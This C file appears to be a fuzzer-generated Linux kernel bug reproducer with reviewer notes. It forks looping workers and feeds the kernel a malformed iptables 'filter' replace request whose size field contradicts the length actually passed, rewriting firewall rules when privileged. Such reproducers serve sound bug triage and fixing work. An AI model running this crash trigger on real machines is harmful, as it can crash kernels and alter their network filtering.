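// https://syzkaller.appspot.com/bug?id=be2e39518462291fd049f665261632ded34b79fd
// autogenerated by syzkaller (http://github.com/google/syzkaller)
//
// Reading notes (added in review):
//  - This is a fuzzer-generated kernel reproducer. main() forks 8 workers;
//    each worker snapshots the IPv4 iptables tables once, then repeatedly
//    runs test() in a child process and restores the snapshot afterwards.
//  - test() ends by submitting a hand-built IPT_SO_SET_REPLACE request for
//    the "filter" table. That is a privileged operation (the checkpoint code
//    below tolerates EPERM), so when it is permitted the program rewrites the
//    netfilter ruleset of whatever network namespace it runs in. Use a
//    disposable VM or namespace when triaging.
//  - The crash itself is not described on this page; see the bug URL above.
//  - The header names of the #include lines were missing from this page. The
//    lists below are reconstructed so that every identifier used in the file
//    is declared; the generator's original list may differ.
//  - Long runs of consecutive single-byte zero stores emitted by the generator
//    are folded into memset() calls in test(); the memory image handed to the
//    kernel is the same.

#define _GNU_SOURCE

#include <endian.h>
#include <errno.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

// Terminate the whole thread group with `status`. The raw exit_group syscall
// is used instead of exit(); the trailing loop only exists so the function can
// never return if the syscall somehow does.
__attribute__((noreturn)) static void doexit(int status)
{
  volatile unsigned i;
  syscall(__NR_exit_group, status);
  for (i = 0;; i++) {
  }
}

#include <stdint.h>
#include <string.h>

const int kFailStatus = 67;
const int kRetryStatus = 69;

// Print a printf-style message plus the errno captured on entry, then exit.
// ENOMEM and EAGAIN map to kRetryStatus, every other errno to kFailStatus.
static void fail(const char* msg, ...)
{
  int e = errno; // saved first: the stdio calls below may overwrite errno
  va_list args;
  va_start(args, msg);
  vfprintf(stderr, msg, args);
  va_end(args);
  fprintf(stderr, " (errno %d)\n", e);
  doexit((e == ENOMEM || e == EAGAIN) ? kRetryStatus : kFailStatus);
}

// Monotonic clock reading in milliseconds; aborts via fail() on error.
static uint64_t current_time_ms()
{
  struct timespec ts;

  if (clock_gettime(CLOCK_MONOTONIC, &ts))
    fail("clock_gettime failed");
  return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}

// Local copies of the iptables sockopt request layouts. The entry tables are
// capped at 1024 bytes here, which is what the size checks in
// checkpoint_net_namespace() enforce.
struct ipt_getinfo {
  char name[32];
  unsigned int valid_hooks;
  unsigned int hook_entry[5];
  unsigned int underflow[5];
  unsigned int num_entries;
  unsigned int size;
};

struct ipt_get_entries {
  char name[32];
  unsigned int size;
  void* entrytable[1024 / sizeof(void*)];
};

struct xt_counters {
  uint64_t pcnt, bcnt;
};

struct ipt_replace {
  char name[32];
  unsigned int valid_hooks;
  unsigned int num_entries;
  unsigned int size;
  unsigned int hook_entry[5];
  unsigned int underflow[5];
  unsigned int num_counters;
  struct xt_counters* counters;
  char entrytable[1024];
};

// Per-table snapshot: what was read at checkpoint time (info, entries) and the
// ready-to-send request that restores it (replace, counters).
struct ipt_table_desc {
  const char* name;
  struct ipt_getinfo info;
  struct ipt_get_entries entries;
  struct ipt_replace replace;
  struct xt_counters counters[10];
};

static struct ipt_table_desc ipv4_tables[] = {
    {.name = "filter"}, {.name = "nat"},      {.name = "mangle"},
    {.name = "raw"},    {.name = "security"},
};

#define IPT_BASE_CTL 64
#define IPT_SO_SET_REPLACE (IPT_BASE_CTL)
#define IPT_SO_GET_INFO (IPT_BASE_CTL)
#define IPT_SO_GET_ENTRIES (IPT_BASE_CTL + 1)

// Snapshot every IPv4 table listed in ipv4_tables so reset_net_namespace()
// can put it back later. Tables the kernel refuses with EPERM, ENOENT or
// ENOPROTOOPT are skipped; their info.valid_hooks stays 0 (static storage),
// which is how the reset pass recognises them.
static void checkpoint_net_namespace(void)
{
  socklen_t optlen;
  unsigned i;
  int fd;

  fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  if (fd == -1)
    fail("socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)");
  for (i = 0; i < sizeof(ipv4_tables) / sizeof(ipv4_tables[0]); i++) {
    struct ipt_table_desc* table = &ipv4_tables[i];
    // Names are the short literals from ipv4_tables, well under 32 bytes.
    strcpy(table->info.name, table->name);
    strcpy(table->entries.name, table->name);
    strcpy(table->replace.name, table->name);
    optlen = sizeof(table->info);
    if (getsockopt(fd, SOL_IP, IPT_SO_GET_INFO, &table->info, &optlen)) {
      switch (errno) {
      case EPERM:
      case ENOENT:
      case ENOPROTOOPT:
        continue;
      }
      fail("getsockopt(IPT_SO_GET_INFO)");
    }
    // The kernel-reported sizes drive the copies below, so they are checked
    // against the fixed-size local buffers first.
    if (table->info.size > sizeof(table->entries.entrytable))
      fail("table size is too large: %u", table->info.size);
    if (table->info.num_entries >
        sizeof(table->counters) / sizeof(table->counters[0]))
      fail("too many counters: %u", table->info.num_entries);
    table->entries.size = table->info.size;
    optlen = sizeof(table->entries) - sizeof(table->entries.entrytable) +
             table->info.size;
    if (getsockopt(fd, SOL_IP, IPT_SO_GET_ENTRIES, &table->entries, &optlen))
      fail("getsockopt(IPT_SO_GET_ENTRIES)");
    // Pre-build the restore request from the snapshot.
    table->replace.valid_hooks = table->info.valid_hooks;
    table->replace.num_entries = table->info.num_entries;
    table->replace.counters = table->counters;
    table->replace.size = table->info.size;
    memcpy(table->replace.hook_entry, table->info.hook_entry,
           sizeof(table->replace.hook_entry));
    memcpy(table->replace.underflow, table->info.underflow,
           sizeof(table->replace.underflow));
    memcpy(table->replace.entrytable, table->entries.entrytable,
           table->info.size);
  }
  close(fd);
}

// Restore every checkpointed table that no longer matches its snapshot.
// A table is left alone when both its info block and its entry blob still
// compare equal to what checkpoint_net_namespace() recorded.
static void reset_net_namespace(void)
{
  struct ipt_get_entries entries;
  struct ipt_getinfo info;
  socklen_t optlen;
  unsigned i;
  int fd;

  memset(&info, 0, sizeof(info));
  memset(&entries, 0, sizeof(entries));
  fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  if (fd == -1)
    fail("socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)");
  for (i = 0; i < sizeof(ipv4_tables) / sizeof(ipv4_tables[0]); i++) {
    struct ipt_table_desc* table = &ipv4_tables[i];
    if (table->info.valid_hooks == 0)
      continue; // never checkpointed
    strcpy(info.name, table->name);
    optlen = sizeof(info);
    if (getsockopt(fd, SOL_IP, IPT_SO_GET_INFO, &info, &optlen))
      fail("getsockopt(IPT_SO_GET_INFO)");
    if (memcmp(&table->info, &info, sizeof(table->info)) == 0) {
      strcpy(entries.name, table->name);
      entries.size = table->info.size;
      optlen = sizeof(entries) - sizeof(entries.entrytable) + entries.size;
      if (getsockopt(fd, SOL_IP, IPT_SO_GET_ENTRIES, &entries, &optlen))
        fail("getsockopt(IPT_SO_GET_ENTRIES)");
      if (memcmp(&table->entries, &entries, optlen) == 0)
        continue; // unchanged
    }
    // num_counters is taken from the table as it is now, not from the
    // snapshot.
    table->replace.num_counters = info.num_entries;
    optlen = sizeof(table->replace) - sizeof(table->replace.entrytable) +
             table->replace.size;
    if (setsockopt(fd, SOL_IP, IPT_SO_SET_REPLACE, &table->replace, optlen))
      fail("setsockopt(IPT_SO_SET_REPLACE)");
  }
  close(fd);
}

static void test();

// Worker loop: checkpoint once, then forever fork a child that runs test(),
// wait for it with a 5 second budget (killing its process group on timeout),
// and restore the iptables snapshot before the next iteration.
void loop()
{
  int iter;

  checkpoint_net_namespace();
  for (iter = 0;; iter++) {
    int pid = fork();
    if (pid < 0)
      fail("loop fork failed");
    if (pid == 0) {
      prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0); // die with the parent
      setpgrp(); // own process group, so kill(-pid) reaches descendants
      test();
      doexit(0);
    }
    int status = 0;
    uint64_t start = current_time_ms();
    for (;;) {
      int res = waitpid(-1, &status, __WALL | WNOHANG);
      if (res == pid)
        break;
      usleep(1000);
      if (current_time_ms() - start > 5 * 1000) {
        kill(-pid, SIGKILL);
        kill(pid, SIGKILL);
        while (waitpid(-1, &status, __WALL) != pid) {
        }
        break;
      }
    }
    reset_net_namespace();
  }
}

long r[2];
uint64_t procid;

// The generated syscall sequence. Arguments live at fixed addresses inside one
// anonymous mapping; return values are not checked, as is usual for generated
// reproducers. Constant decodings in the comments are Linux x86-64 values.
void test()
{
  memset(r, -1, sizeof(r));
  // prot 3 = PROT_READ|PROT_WRITE, flags 0x32 = MAP_PRIVATE|MAP_FIXED|
  // MAP_ANONYMOUS: a zero-filled scratch area at 0x20000000.
  syscall(__NR_mmap, 0x20000000, 0xfff000, 3, 0x32, -1, 0);

  // The calls in this group are made on fd -1 (or on r[0], which holds the
  // result of accept() on fd -1), so they are expected to fail.
  syscall(__NR_epoll_ctl, -1, 2, -1);
  *(uint32_t*)0x20004000 = 0x7fffffff;
  syscall(__NR_setsockopt, -1, 0x84, 0x20, 0x20004000, 4);
  *(uint32_t*)0x209ba000 = 0x10;
  r[0] = syscall(__NR_accept, -1, 0x20ac7000, 0x209ba000);
  // 16-byte socket address, family 0x1a (AF_LLC on Linux).
  *(uint16_t*)0x20000000 = 0x1a;
  *(uint16_t*)0x20000002 = htobe16(0);
  *(uint8_t*)0x20000004 = 0xd4;
  *(uint8_t*)0x20000005 = 0;
  *(uint8_t*)0x20000006 = 8;
  *(uint8_t*)0x20000007 = 5;
  *(uint8_t*)0x20000008 = 0xaa;
  *(uint8_t*)0x20000009 = 0xaa;
  *(uint8_t*)0x2000000a = 0xaa;
  *(uint8_t*)0x2000000b = 0xaa;
  *(uint8_t*)0x2000000c = 0 + procid * 1;
  *(uint8_t*)0x2000000d = 0xbb;
  *(uint8_t*)0x2000000e = 0;
  *(uint8_t*)0x2000000f = 0;
  syscall(__NR_bind, r[0], 0x20000000, 0x10);
  *(uint32_t*)0x20005000 = 0x7fffffff;
  syscall(__NR_setsockopt, -1, 0x84, 0x21, 0x20005000, 4);
  *(uint32_t*)0x20006fb0 = 0;
  *(uint32_t*)0x20006fb4 = 0;
  *(uint32_t*)0x20003ffc = 8;
  syscall(__NR_getsockopt, -1, 0x84, 0x1b, 0x20006fb0, 0x20003ffc);

  // family 2 = AF_INET, type 0x80005 = SOCK_SEQPACKET|SOCK_CLOEXEC.
  r[1] = syscall(__NR_socket, 2, 0x80005, 0);

  // Request blob at 0x204c6000. On an LP64 target the offsets line up with
  // struct ipt_replace above: name at +0x00, valid_hooks +0x20, num_entries
  // +0x24, size +0x28, hook_entry[5] +0x2c, underflow[5] +0x40, num_counters
  // +0x54, counters +0x58, entrytable +0x60.
  // name = "filter"
  memcpy((void*)0x204c6000, "\x66\x69\x6c\x74\x65\x72\x00\x00\x00\x00\x00\x00"
                            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                            "\x00\x00\x00\x00\x00\x00\x00\x00",
         32);
  *(uint32_t*)0x204c6020 = 0xe;
  *(uint32_t*)0x204c6024 = 4;
  // The size field does not match the 0x2e0 bytes actually passed to
  // setsockopt() at the end of this function.
  *(uint32_t*)0x204c6028 = 0xfffffee1;
  *(uint32_t*)0x204c602c = -1;
  *(uint32_t*)0x204c6030 = 0;
  *(uint32_t*)0x204c6034 = 0;
  *(uint32_t*)0x204c6038 = 0;
  *(uint32_t*)0x204c603c = -1;
  *(uint32_t*)0x204c6040 = -1;
  *(uint32_t*)0x204c6044 = 0;
  *(uint32_t*)0x204c6048 = 0;
  *(uint32_t*)0x204c604c = 0;
  *(uint32_t*)0x204c6050 = -1;
  *(uint32_t*)0x204c6054 = 4;
  *(uint64_t*)0x204c6058 = 0x20001000;

  // Four rule records follow at +0x60, +0xf8, +0x190 and +0x228. Each stores
  // 0x70 at record+0x58 and its distance to the next record at record+0x5a;
  // presumably these are ipt_entry.target_offset/next_offset, but that layout
  // is not declared in this file.

  // Record 1 (+0x60): 84 zero bytes (0x204c6060..0x204c60b3), empty name.
  memset((void*)0x204c6060, 0, 84);
  *(uint32_t*)0x204c60b4 = 0;
  *(uint16_t*)0x204c60b8 = 0x70;
  *(uint16_t*)0x204c60ba = 0x98;
  *(uint32_t*)0x204c60bc = 0;
  *(uint64_t*)0x204c60c0 = 0;
  *(uint64_t*)0x204c60c8 = 0;
  *(uint16_t*)0x204c60d0 = 0x28;
  memcpy((void*)0x204c60d2, "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                            "\x00\x00\x00\x00\x00",
         29);
  *(uint8_t*)0x204c60ef = 0;
  *(uint32_t*)0x204c60f0 = 0xfffffffe;

  // Record 2 (+0xf8): name strings "bcsh0" and "syz", target name "REJECT".
  *(uint32_t*)0x204c60f8 = htobe32(-1);
  *(uint8_t*)0x204c60fc = 0xac;
  *(uint8_t*)0x204c60fd = 0x14;
  *(uint8_t*)0x204c60fe = 0;
  *(uint8_t*)0x204c60ff = 0xbb;
  *(uint32_t*)0x204c6100 = htobe32(0);
  *(uint32_t*)0x204c6104 = htobe32(0);
  memcpy((void*)0x204c6108,
         "\x62\x63\x73\x68\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
         16);
  *(uint8_t*)0x204c6118 = 0x73;
  *(uint8_t*)0x204c6119 = 0x79;
  *(uint8_t*)0x204c611a = 0x7a;
  *(uint8_t*)0x204c611b = 0;
  *(uint8_t*)0x204c611c = 0;
  // 0x204c611d..0x204c6127 are never written and stay zero from the mmap.
  *(uint8_t*)0x204c6128 = -1;
  // 31 zero bytes, 0x204c6129..0x204c6147.
  memset((void*)0x204c6129, 0, 31);
  *(uint16_t*)0x204c6148 = 0;
  *(uint8_t*)0x204c614a = 0;
  *(uint8_t*)0x204c614b = 0;
  *(uint32_t*)0x204c614c = 0;
  *(uint16_t*)0x204c6150 = 0x70;
  *(uint16_t*)0x204c6152 = 0x98;
  *(uint32_t*)0x204c6154 = 0;
  *(uint64_t*)0x204c6158 = 0;
  *(uint64_t*)0x204c6160 = 0;
  *(uint16_t*)0x204c6168 = 0x28;
  memcpy((void*)0x204c616a, "\x52\x45\x4a\x45\x43\x54\x00\x00\x00\x00\x00\x00"
                            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                            "\x00\x00\x00\x00\x00",
         29);
  *(uint8_t*)0x204c6187 = 0;
  *(uint32_t*)0x204c6188 = 0;

  // Record 3 (+0x190): 84 zero bytes (0x204c6190..0x204c61e3), target name
  // "AUDIT".
  memset((void*)0x204c6190, 0, 84);
  *(uint32_t*)0x204c61e4 = 0;
  *(uint16_t*)0x204c61e8 = 0x70;
  *(uint16_t*)0x204c61ea = 0x98;
  *(uint32_t*)0x204c61ec = 0;
  *(uint64_t*)0x204c61f0 = 0;
  *(uint64_t*)0x204c61f8 = 0;
  *(uint16_t*)0x204c6200 = 0x28;
  memcpy((void*)0x204c6202, "\x41\x55\x44\x49\x54\x00\x00\x00\x00\x00\x00\x00"
                            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                            "\x00\x00\x00\x00\x00",
         29);
  *(uint8_t*)0x204c621f = 0;
  *(uint8_t*)0x204c6220 = 3;

  // Record 4 (+0x228): 84 zero bytes (0x204c6228..0x204c627b), target name
  // "LED" followed by the string "syz0". This record is 0xb8 bytes long and
  // ends at +0x2e0, the length passed to setsockopt() below.
  memset((void*)0x204c6228, 0, 84);
  *(uint32_t*)0x204c627c = 0;
  *(uint16_t*)0x204c6280 = 0x70;
  *(uint16_t*)0x204c6282 = 0xb8;
  *(uint32_t*)0x204c6284 = 0;
  *(uint64_t*)0x204c6288 = 0;
  *(uint64_t*)0x204c6290 = 0;
  *(uint16_t*)0x204c6298 = 0x48;
  memcpy((void*)0x204c629a, "\x4c\x45\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                            "\x00\x00\x00\x00\x00",
         29);
  *(uint8_t*)0x204c62b7 = 0;
  memcpy((void*)0x204c62b8, "\x73\x79\x7a\x30\x00\x00\x00\x00\x00\x00\x00\x00"
                            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                            "\x00\x00\x00",
         27);
  *(uint8_t*)0x204c62d3 = 0;
  *(uint32_t*)0x204c62d4 = 0;
  *(uint64_t*)0x204c62d8 = 0;

  // Counter array referenced by the counters pointer: 4 x {pcnt, bcnt}.
  *(uint64_t*)0x20001000 = 0;
  *(uint64_t*)0x20001008 = 0;
  *(uint64_t*)0x20001010 = 0;
  *(uint64_t*)0x20001018 = 0;
  *(uint64_t*)0x20001020 = 0;
  *(uint64_t*)0x20001028 = 0;
  *(uint64_t*)0x20001030 = 0;
  *(uint64_t*)0x20001038 = 0;

  // level 0, optname 0x40 == IPT_SO_SET_REPLACE as defined above; 0x2e0 bytes.
  syscall(__NR_setsockopt, r[1], 0, 0x40, 0x204c6000, 0x2e0);
  // family 1 = AF_UNIX, type 1 = SOCK_STREAM.
  syscall(__NR_socket, 1, 1, 0);
}

// Start 8 worker processes (procid 0..7), each running loop() forever; the
// parent just sleeps. A failed fork() is not reported here.
int main()
{
  for (procid = 0; procid < 8; procid++) {
    if (fork() == 0) {
      for (;;) {
        loop();
      }
    }
  }
  sleep(1000000);
  return 0;
}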